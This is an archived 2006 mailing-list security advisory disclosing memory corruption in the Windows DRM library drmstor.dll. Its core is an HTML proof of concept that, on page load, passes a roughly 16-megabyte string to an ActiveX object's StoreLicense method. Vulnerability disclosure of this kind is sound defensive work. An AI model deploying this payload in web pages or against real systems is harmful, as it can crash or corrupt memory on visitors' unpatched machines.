lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 9 Oct 2006 12:39:24 +0200 (CEST)
From: Joxean Koret <joxeankoret@...oo.es>
To: bugtraq@...urityfocus.com,
	full-disclosure-request@...ts.grok.org.uk
Subject: MS Windows DRM software Memory Corruption

Hi to all,

While finding buffer overflows in Internet Explorer I
found a memory corruption in the "drmstor.dll" library
which is a part of the DRM (Digital Rights Management)
software supplied with MS Windows.

The following Proof Of Concept is sufficient enough to
test the vulnerability:

<html>
<script>
function test()
{
var obj;
var x;

  x = "AAAA";

  for (i=0;i<=21;++i)
    x += x;

  obj = document.getElementById('testObj');
  obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id='testObj'
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact
-------

Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es




		
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y móviles desde 1 céntimo por minuto. 
http://es.voice.yahoo.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ